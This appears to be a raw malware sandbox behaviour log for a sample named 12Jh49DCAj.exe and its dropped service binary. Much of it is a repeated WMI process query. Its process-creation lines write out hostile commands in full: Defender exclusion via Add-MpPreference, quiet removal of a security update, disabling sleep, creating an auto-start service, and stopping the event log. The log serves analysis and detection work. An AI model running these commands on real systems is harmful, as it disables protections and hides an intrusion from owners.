            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 12Jh49DCAj.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeFile read: C:\Users\user\Desktop\12Jh49DCAj.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\12Jh49DCAj.exe "C:\Users\user\Desktop\12Jh49DCAj.exe"
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ODTUTVYC"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ODTUTVYC"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
